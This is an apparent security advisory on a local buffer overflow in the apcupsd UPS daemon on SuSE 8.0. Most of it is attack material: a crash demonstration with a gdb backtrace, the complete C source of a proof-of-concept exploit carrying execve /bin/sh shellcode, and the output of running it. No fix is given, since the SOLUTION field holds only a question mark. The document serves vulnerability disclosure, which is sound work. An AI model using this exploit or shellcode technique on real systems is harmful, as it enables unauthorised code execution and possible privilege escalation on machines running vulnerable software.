|
COMMAND apcupsd local buffer overflow SYSTEMS AFFECTED tested with apcupsd delivered with Suse 8.0 PROBLEM Thanks to Serkan Akpolat [sakpolat@gmx.net] advisory : Apcupsd is a deamon for most APC's UPS for Linux There is no bounds checking in the source code ,so overflowing the buffer is possible. Apcupsd is by default not setuid root (SuSE 8.0) A proof of concept shell spawning exploit is attached to mail. milkshake:~ # apcupsd -f AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Segmentation fault (core dumped) milkshake:~ # gdb -q /sbin/apcupsd ./core (no debugging symbols found)... Core was generated by `apcupsd -f AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libpthread.so.0...(no debugging symbols found)...done. [New Thread 1024 (LWP 1920)] Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x40091a99 in vfprintf () from /lib/libc.so.6 (gdb) bt #0 0x40091a99 in vfprintf () from /lib/libc.so.6 #1 0x400a8a86 in vsprintf () from /lib/libc.so.6 #2 0x08049b0c in strcpy () #3 0x41414141 in ?? () (gdb) q Exploit spawns a shell with the uid of the user ,who runs the exploit. Tested on SuSE 8.0 milkshake:~ # cat eXapcupsd.c /* Proof of Concept Code for buffer overflow vulnerability in apcupsd--------*/ /* This code has been tested in SuSE 8.0 -----------------------------------*/ /* Apcupsd isn't by default setuid root in SuSE 8.0------------------------*/ /* This code spawns a shell with the uid of the user, who runs the expolit*/ /* Greetings to Avicenna , Hackpimp , Murat Balaban , core.gen.tr team---*/ /* Written by Serkan Akpolat sakpolat@gmx.net --------------------------*/ #include <stdio.h> #include <string.h> #include <unistd.h> #define BUFSIZE 500 #define PADDING 3 char sc[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; /* Murat Balaban execve /bin/sh shellcode */ int main(void) { char *env[3] = {sc, NULL}; char buf[BUFSIZE]; int i,j,ret; int *ap; for(j=0;j < PADDING;j++){ buf[j]='A';} ap = (int *)(buf + PADDING); ret = 0xbffffffa - strlen(sc) -strlen("/sbin/apcupsd"); printf("Shellcode is on 0x%08x , %d junk bytes used for alignment.\n",ret,PADDING); printf("\t\t<--PRESS ENTER-->"); for (i = 0; i < BUFSIZE - 8; i += 4) *ap++ = ret; *ap++ ='\0'; getchar(); execle("/sbin/apcupsd", "apcupsd", "-f", buf, NULL, env); } milkshake:~ # gcc eXapcupsd.c milkshake:~ # ./a.out Shellcode is on 0xbfffffc0 , 3 junk bytes used for alignment. <--PRESS ENTER--> apcupsd FATAL ERROR in apcconfig.c at line 833 Error opening configuration file (AAAÀÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿Àÿÿ¿): ë~^ SOLUTION ?